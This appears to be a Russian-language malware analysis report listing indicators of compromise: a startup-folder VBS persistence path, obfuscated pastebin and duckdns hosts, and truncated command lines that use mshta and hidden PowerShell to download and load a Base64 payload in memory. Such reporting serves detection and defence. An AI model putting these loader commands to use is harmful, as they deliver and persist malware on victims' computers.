Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.vbs
- h+t+t+p+s+:+//+p+a+s+t+e+b+i+n+.+c+o+m/raw/4ba3pcyy
- nul
- 'dr##.#uckdns.org':1414
- 'pa###bin.com':443
- DNS ASK pa###bin.com
- DNS ASK dr##.#uckdns.org
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object ...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+'p'+'s'+':'+'//'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object ...
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 10
- '<SYSTEM32>\mshta.exe' vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+...